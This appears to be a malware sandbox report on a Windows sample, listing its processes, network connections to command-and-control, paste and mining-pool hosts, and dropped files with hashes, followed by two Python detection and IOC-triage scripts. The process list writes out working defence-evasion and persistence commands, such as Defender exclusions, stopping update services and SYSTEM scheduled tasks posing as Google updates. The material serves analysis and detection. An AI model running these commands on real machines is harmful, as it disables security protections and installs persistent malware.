C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1548 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=37844 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1844 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37844 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2152 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37844 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2520 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37844 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3044 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37844 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2176 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37844 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3340 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=3280 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x254

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2108 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#gaydwxjuvlccdkkvygm#> powershell <#gaydwxjuvlccdkkvygm#> -Verb <#gaydwxjuvlccdkkvygm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 12:38 /f /tn MicrosoftEdgeTask_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 12:38 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe
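The command lines in this list are the observable side of the sample's defence evasion and persistence: Windows Defender exclusions added with Add-MpPreference (once through a hidden, elevated Start-Process wrapper padded with <#...#> block comments), the update-related services UsoSvc, WaaSMedicSvc, wuauserv, bits and dosvc stopped through sc, standby and hibernation disabled with powercfg, three scheduled tasks (GoogleUpdateTaskMachineQC running C:\Program Files\Google\Chrome\updater.exe as SYSTEM, MicrosoftEdgeTask_MTA1 running an executable under C:\ProgramData, and AppLaunch running the .NET AppLaunch.exe host), and headless Chrome started with --remote-debugging-port=37844 against a copied profile directory named User DataU8A8E. The Python below is an added example and is not part of the report or of any vendor's detection content: it runs a small rule set over process-creation records of the kind Sysmon Event ID 1 or an EDR exposes, stripping the PowerShell comment padding before matching so the obfuscated and plain forms trigger the same rule. The sample records are built from the command lines in this list (the report does not record parent processes, so none are modelled); the rule names, the ATT&CK mappings and the user-writable-path and injection-host lists are the example's own heuristics.

```python
"""Command-line rules for the process list above (added example, see lead-in)."""
import re
from collections import namedtuple

ProcessEvent = namedtuple("ProcessEvent", "image cmdline")  # as Sysmon EID 1 / EDR would give them
Hit = namedtuple("Hit", "rule technique evidence")          # technique = MITRE ATT&CK id

PS_COMMENT = re.compile(r"<#.*?#>", re.S)  # <#lwilj#> style padding used by the sample
TASK_NAME = re.compile(r"""(?:/tn|-TaskName)\s+["']?([^"'\s]+)""", re.I)
TASK_ACTION = re.compile(r"""(?:/tr|-Execute)\s+["']+(.+?)["']+""", re.I)
USER_DATA_DIR = re.compile(r'--user-data-dir=(?:"([^"]*)"|(\S+))')
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
# Heuristic lists: the example's own, not taken from the report.
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\temp\\", "\\users\\public\\")
INJECTION_HOSTS = ("applaunch.exe",)

def normalize(cmdline: str) -> str:
    """Strip PowerShell block comments and collapse whitespace so the padded
    and plain forms of a command match the same patterns."""
    return re.sub(r"\s+", " ", PS_COMMENT.sub(" ", cmdline)).strip()

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def rule_defender_exclusion(ev, cmd):
    if (basename(ev.image) == "powershell.exe" and "add-mppreference" in cmd.lower()
            and re.search(r"-Exclusion(Path|Extension|Process)", cmd, re.I)):
        return Hit("defender_exclusion", "T1562.001", cmd[:90])

def rule_stop_update_services(ev, cmd):
    stopped = {s.lower() for s in re.findall(r"\bsc(?:\.exe)?\s+stop\s+(\S+)", cmd, re.I)}
    if stopped & UPDATE_SERVICES:
        return Hit("stop_update_services", "T1489", ", ".join(sorted(stopped & UPDATE_SERVICES)))

def rule_powercfg_never_sleep(ev, cmd):
    if re.search(r"powercfg\s+/x\s+-(standby|hibernate)-timeout-(ac|dc)\s+0\b", cmd, re.I):
        return Hit("powercfg_never_sleep", "T1562.001", cmd[:90])

def rule_scheduled_task(ev, cmd):
    if not re.search(r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask", cmd, re.I):
        return None
    name, action = TASK_NAME.search(cmd), TASK_ACTION.search(cmd)
    if not (name and action):
        return None
    name, path = name.group(1), action.group(1)
    low, reasons = path.lower(), []
    if any(seg in low for seg in USER_WRITABLE):
        reasons.append("action in user-writable path")
    if basename(path) in INJECTION_HOSTS:
        reasons.append("action is a known injection host")
    if name.lower().startswith("googleupdatetaskmachine") and "\\google\\update\\" not in low:
        reasons.append("name mimics Google Update task, action is not GoogleUpdate.exe")
    if re.search(r"""/ru\s+["']?system|-User\s+["']?System""", cmd, re.I):
        reasons.append("runs as SYSTEM")
    if reasons:
        return Hit("suspicious_scheduled_task", "T1053.005", f"{name} -> {path} ({'; '.join(reasons)})")

def rule_headless_chrome_remote_debug(ev, cmd):
    # Browser (broker) process only: its --type= children inherit the same flags.
    if basename(ev.image) != "chrome.exe" or "--type=" in cmd:
        return None
    if "--headless" in cmd and "--remote-debugging-port=" in cmd:
        m = USER_DATA_DIR.search(cmd)
        profile = (m.group(1) or m.group(2)) if m else "<default>"
        return Hit("headless_chrome_remote_debug", "T1539", f"profile={profile}")

RULES = [rule_defender_exclusion, rule_stop_update_services, rule_powercfg_never_sleep,
         rule_scheduled_task, rule_headless_chrome_remote_debug]

def scan(events):
    hits = []
    for ev in events:
        cmd = normalize(ev.cmdline)
        hits.extend(h for h in (rule(ev, cmd) for rule in RULES) if h)
    return hits

# Constructed from the report's process list (command lines verbatim, one shortened).
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [
    ProcessEvent(PS64, r"powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0"),
    ProcessEvent(PS64, r"""powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }"""),
    ProcessEvent(PS32, r"""powershell "Start-Process <#gaydwxjuvlccdkkvygm#> powershell <#gaydwxjuvlccdkkvygm#> -Verb <#gaydwxjuvlccdkkvygm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'"""),
    ProcessEvent(r"C:\Windows\SysWOW64\schtasks.exe", r'schtasks /create /sc daily /st 12:38 /f /tn MicrosoftEdgeTask_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"'),
    ProcessEvent(r"C:\Windows\SysWOW64\schtasks.exe", r'schtasks /create /sc daily /st 12:38 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"'),
    ProcessEvent(CHROME, r'''"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=37844 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataU8A8E" --profile-directory="Default"'''),
    ProcessEvent(CHROME, r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --remote-debugging-port=37844'),  # child: must not fire
    ProcessEvent(r"C:\Windows\System32\sc.exe", r"sc stop Spooler"),  # control: not an update service
]

if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"{h.rule:30} {h.technique:10} {h.evidence}")
```

Run directly it prints one line per hit; scan() returns Hit tuples so the same rules can be pointed at a real event export. The Chrome rule fires once on the browser process and ignores the --type= children, which carry the same flags. In production you would also require the parent not to be chrome.exe or a known automation tool, because headless Chrome with remote debugging is exactly how test frameworks drive the browser; what makes it malicious here is the non-browser parent and the copied profile directory.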

Network

Country Destination            Domain                         Proto
PL      51.83.170.21:19447     -                              tcp
US      8.8.8.8:53             21.170.83.51.in-addr.arpa      udp
US      8.8.8.8:53             transfer.sh                    udp
DE      144.76.136.153:443     transfer.sh                    tcp
US      8.8.8.8:53             153.136.76.144.in-addr.arpa    udp
US      8.8.8.8:53             www.microsoft.com              udp
NL      104.85.1.163:80        www.microsoft.com              tcp
NL      104.85.1.163:443       www.microsoft.com              tcp
US      8.8.8.8:53             ip-api.com                     udp
US      208.95.112.1:80        ip-api.com                     tcp
US      8.8.8.8:53             163.1.85.104.in-addr.arpa      udp
US      8.8.8.8:53             71.121.18.2.in-addr.arpa       udp
US      8.8.8.8:53             254.133.241.8.in-addr.arpa     udp
US      8.8.8.8:53             108.211.229.192.in-addr.arpa   udp
US      8.8.8.8:53             1.112.95.208.in-addr.arpa      udp
RU      185.159.129.168:80     -                              tcp
RU      185.149.146.118:80     -                              tcp
RU      77.91.77.144:80        -                              tcp
N/A     127.0.0.1:37844        -                              tcp
N/A     127.0.0.1:37844        -                              tcp
US      8.8.8.8:53             youtube.com                    udp
NL      216.58.214.14:443      youtube.com                    tcp
US      8.8.8.8:53             ogs.google.com                 udp
US      8.8.8.8:53             apis.google.com                udp
US      8.8.8.8:53             196.168.217.172.in-addr.arpa   udp
US      8.8.8.8:53             195.179.250.142.in-addr.arpa   udp
US      8.8.8.8:53             14.214.58.216.in-addr.arpa     udp
US      8.8.8.8:53             i.ytimg.com                    udp
N/A     127.0.0.1:37844        -                              tcp
GB      216.58.208.118:443     i.ytimg.com                    tcp
N/A     127.0.0.1:37844        -                              tcp
US      8.8.8.8:53             accounts.google.com            udp
NL      142.250.179.141:443    accounts.google.com            tcp
US      8.8.8.8:53             play.google.com                udp
NL      142.250.179.141:443    accounts.google.com            udp
NL      142.251.36.14:443      play.google.com                tcp
NL      142.251.36.14:443      play.google.com                udp
US      8.8.8.8:53             206.179.250.142.in-addr.arpa   udp
US      8.8.8.8:53             142.179.250.142.in-addr.arpa   udp
US      8.8.8.8:53             118.208.58.216.in-addr.arpa    udp
US      8.8.8.8:53             106.208.58.216.in-addr.arpa    udp
US      8.8.8.8:53             14.36.251.142.in-addr.arpa     udp
US      8.8.8.8:53             141.179.250.142.in-addr.arpa   udp
US      8.8.8.8:53             130.179.250.142.in-addr.arpa   udp
US      8.8.8.8:53             googleads.g.doubleclick.net    udp
NL      142.251.36.2:443       googleads.g.doubleclick.net    tcp
NL      142.251.36.2:443       googleads.g.doubleclick.net    udp
US      8.8.8.8:53             2.36.251.142.in-addr.arpa      udp
GB      216.58.208.118:443     i.ytimg.com                    udp
US      8.8.8.8:53             yt3.ggpht.com                  udp
NL      142.251.36.1:443       yt3.ggpht.com                  tcp
NL      142.251.36.1:443       yt3.ggpht.com                  tcp
NL      142.251.36.1:443       yt3.ggpht.com                  tcp
NL      142.251.36.1:443       yt3.ggpht.com                  tcp
US      8.8.8.8:53             jnn-pa.googleapis.com          udp
US      8.8.8.8:53             static.doubleclick.net         udp
US      8.8.8.8:53             1.36.251.142.in-addr.arpa      udp
NL      142.251.36.6:443       static.doubleclick.net         tcp
US      8.8.8.8:53             6.36.251.142.in-addr.arpa      udp
US      8.8.8.8:53             accounts.google.com            udp
NL      142.250.179.141:443    accounts.google.com            tcp
US      8.8.8.8:53             pastebin.com                   udp
US      172.67.34.170:80       pastebin.com                   tcp
US      172.67.34.170:443      pastebin.com                   tcp
RU      46.29.235.84:80        46.29.235.84                   tcp
US      8.8.8.8:53             170.34.67.172.in-addr.arpa     udp
US      8.8.8.8:53             84.235.29.46.in-addr.arpa      udp
US      8.8.8.8:53             stratum-eu.rplant.xyz          udp
FR      141.94.192.217:17056   stratum-eu.rplant.xyz          tcp
US      8.8.8.8:53             217.192.94.141.in-addr.arpa    udp
US      8.8.8.8:53             254.135.241.8.in-addr.arpa     udp
US      8.8.8.8:53             211.143.182.52.in-addr.arpa    udp
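Most of the Network table is noise: reverse-DNS lookups through 8.8.8.8 and Google and YouTube traffic generated by the headless Chrome instance. The rows worth acting on are the direct-to-IP connections that no name resolution preceded (51.83.170.21:19447 and the four RU-geolocated hosts on port 80), the legitimate services used for hosting and lookup (transfer.sh, pastebin.com, ip-api.com), the stratum mining-pool connection to stratum-eu.rplant.xyz:17056, and the loopback connections to 127.0.0.1:37844, which is the --remote-debugging-port passed to chrome.exe in the Processes list. The Python below is an added example, not part of the report: it parses rows in the table's own layout (a missing or '-' domain cell means no domain), buckets them by category and returns the blockable indicators. The embedded rows are a subset copied from the table; the category names and the labels given to the abused services are the example's own heuristics, and direct_ip marks a candidate C2 endpoint rather than a confirmed one.

```python
"""Triage of the Network table above (added example, see lead-in)."""
import ipaddress
import re
from collections import defaultdict

# Subset of rows copied verbatim from the table; three fields means no domain cell.
ROWS = """\
PL 51.83.170.21:19447 tcp
US 8.8.8.8:53 21.170.83.51.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RU 185.159.129.168:80 tcp
RU 185.149.146.118:80 tcp
RU 77.91.77.144:80 tcp
N/A 127.0.0.1:37844 tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.251.36.2:443 googleads.g.doubleclick.net tcp
US 172.67.34.170:443 pastebin.com tcp
RU 46.29.235.84:80 46.29.235.84 tcp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
NL 104.85.1.163:443 www.microsoft.com tcp
"""

# Legitimate services this sample used; the role labels are the example's own.
ABUSED_SERVICES = {
    "transfer.sh": "payload hosting",
    "pastebin.com": "config / payload staging",
    "ip-api.com": "external IP lookup",
}
BROWSER_NOISE = re.compile(
    r"(^|\.)(google\.com|youtube\.com|ytimg\.com|ggpht\.com|googleapis\.com|doubleclick\.net)$")
DEVTOOLS_PORT = 37844  # --remote-debugging-port of the headless chrome.exe in the process list
ACTIONABLE = {"abused_service", "mining_pool", "direct_ip"}


def parse_row(line: str) -> dict:
    """Country Destination [Domain] Proto; a missing field or '-' means no domain."""
    parts = line.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:
        country, dest, proto = parts
        domain = ""
    else:
        raise ValueError(f"unexpected row: {line!r}")
    host, port = dest.rsplit(":", 1)
    return {"country": country, "ip": host, "port": int(port),
            "domain": "" if domain == "-" else domain, "proto": proto}


def is_ip(text: str) -> bool:
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def classify(row: dict) -> str:
    ip, port, domain = row["ip"], row["port"], row["domain"]
    if port == 53:
        return "dns_reverse_noise" if domain.endswith(".in-addr.arpa") else "dns_query"
    if ipaddress.ip_address(ip).is_loopback:
        # Local connections to the DevTools port: the sample talking to headless Chrome.
        return "devtools_loopback" if port == DEVTOOLS_PORT else "loopback"
    if domain in ABUSED_SERVICES:
        return "abused_service"
    if "stratum" in domain:          # stratum = mining pool protocol
        return "mining_pool"
    if BROWSER_NOISE.search(domain):
        return "browser_noise"
    if not domain or is_ip(domain):  # no name resolution preceded the connection
        return "direct_ip"
    return "other"


def triage(text: str) -> dict:
    buckets = defaultdict(list)
    for line in text.splitlines():
        if line.strip():
            row = parse_row(line)
            buckets[classify(row)].append(row)
    return buckets


def iocs(text: str) -> set:
    """Blockable indicators: ip:port for actionable categories, plus the domain if any."""
    out = set()
    for cat, rows in triage(text).items():
        if cat in ACTIONABLE:
            for r in rows:
                out.add(f"{r['ip']}:{r['port']}")
                if r["domain"] and not is_ip(r["domain"]):
                    out.add(r["domain"])
    return out


if __name__ == "__main__":
    for cat, rows in sorted(triage(ROWS).items()):
        print(cat, [f"{r['ip']}:{r['port']} {r['domain']}".strip() for r in rows])
    print("IOCs:", sorted(iocs(ROWS)))
```

iocs() returns ip:port strings plus bare domains so the output can go straight into a block list or a retro-hunt. The dns_query bucket is kept apart from the connections because a lookup on its own, without the TCP session that follows it, is weaker evidence; the browser_noise bucket is what the headless Chrome produces when it loads Google properties with the copied profile, and is useful only as context for the devtools_loopback rows.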

Files

memory/4340-117-0x0000000001940000-0x0000000001969000-memory.dmp

memory/4340-118-0x0000000003500000-0x000000000353F000-memory.dmp

memory/4340-119-0x0000000000400000-0x00000000018CD000-memory.dmp

memory/4340-120-0x0000000003B40000-0x0000000003B78000-memory.dmp

memory/4340-121-0x0000000073DD0000-0x00000000744BE000-memory.dmp

memory/4340-122-0x0000000006110000-0x0000000006120000-memory.dmp

memory/4340-123-0x0000000006110000-0x0000000006120000-memory.dmp

memory/4340-124-0x0000000006110000-0x0000000006120000-memory.dmp

memory/4340-125-0x0000000006120000-0x000000000661E000-memory.dmp

memory/4340-126-0x0000000003690000-0x00000000036C4000-memory.dmp

memory/4340-127-0x00000000037D0000-0x00000000037D6000-memory.dmp

memory/4340-128-0x000000000BAA0000-0x000000000C0A6000-memory.dmp

memory/4340-129-0x000000000C0F0000-0x000000000C1FA000-memory.dmp

memory/4340-130-0x000000000C220000-0x000000000C232000-memory.dmp

memory/4340-131-0x0000000006110000-0x0000000006120000-memory.dmp

memory/4340-132-0x000000000C240000-0x000000000C27E000-memory.dmp

memory/4340-133-0x000000000C2E0000-0x000000000C32B000-memory.dmp

memory/4340-134-0x0000000001940000-0x0000000001969000-memory.dmp

memory/4340-135-0x0000000000400000-0x00000000018CD000-memory.dmp

memory/4340-137-0x0000000003500000-0x000000000353F000-memory.dmp

memory/4340-138-0x0000000073DD0000-0x00000000744BE000-memory.dmp

memory/4340-139-0x000000000C420000-0x000000000C496000-memory.dmp

memory/4340-140-0x000000000C4A0000-0x000000000C532000-memory.dmp

memory/4340-141-0x000000000C640000-0x000000000C6A6000-memory.dmp

memory/4340-142-0x0000000006110000-0x0000000006120000-memory.dmp

memory/4340-143-0x0000000006110000-0x0000000006120000-memory.dmp

memory/4340-144-0x000000000D0E0000-0x000000000D2A2000-memory.dmp

memory/4340-145-0x000000000DA90000-0x000000000DFBC000-memory.dmp

memory/4340-146-0x000000000D3E0000-0x000000000D430000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/5104-158-0x0000000000A20000-0x0000000000CAB000-memory.dmp

memory/5104-164-0x0000000000A20000-0x0000000000CAB000-memory.dmp

memory/3000-166-0x0000000000400000-0x0000000000527000-memory.dmp

memory/3000-173-0x0000000000400000-0x0000000000527000-memory.dmp

memory/3000-175-0x00000000FE850000-0x00000000FE860000-memory.dmp

memory/3000-176-0x00000000FE850000-0x00000000FE860000-memory.dmp

memory/3000-177-0x00000000FE850000-0x00000000FE860000-memory.dmp

memory/3000-180-0x00000000FE850000-0x00000000FE860000-memory.dmp

memory/3000-181-0x00000000FE850000-0x00000000FE860000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/2400-182-0x0000000000200000-0x0000000000834000-memory.dmp

memory/3000-184-0x00000000FE850000-0x00000000FE860000-memory.dmp

memory/3000-183-0x00000000FE850000-0x00000000FE860000-memory.dmp

memory/3000-189-0x00000000FE850000-0x00000000FE860000-memory.dmp

memory/5104-192-0x0000000000A20000-0x0000000000CAB000-memory.dmp

memory/2400-190-0x0000000000200000-0x0000000000834000-memory.dmp

memory/3000-193-0x00000000FE850000-0x00000000FE860000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
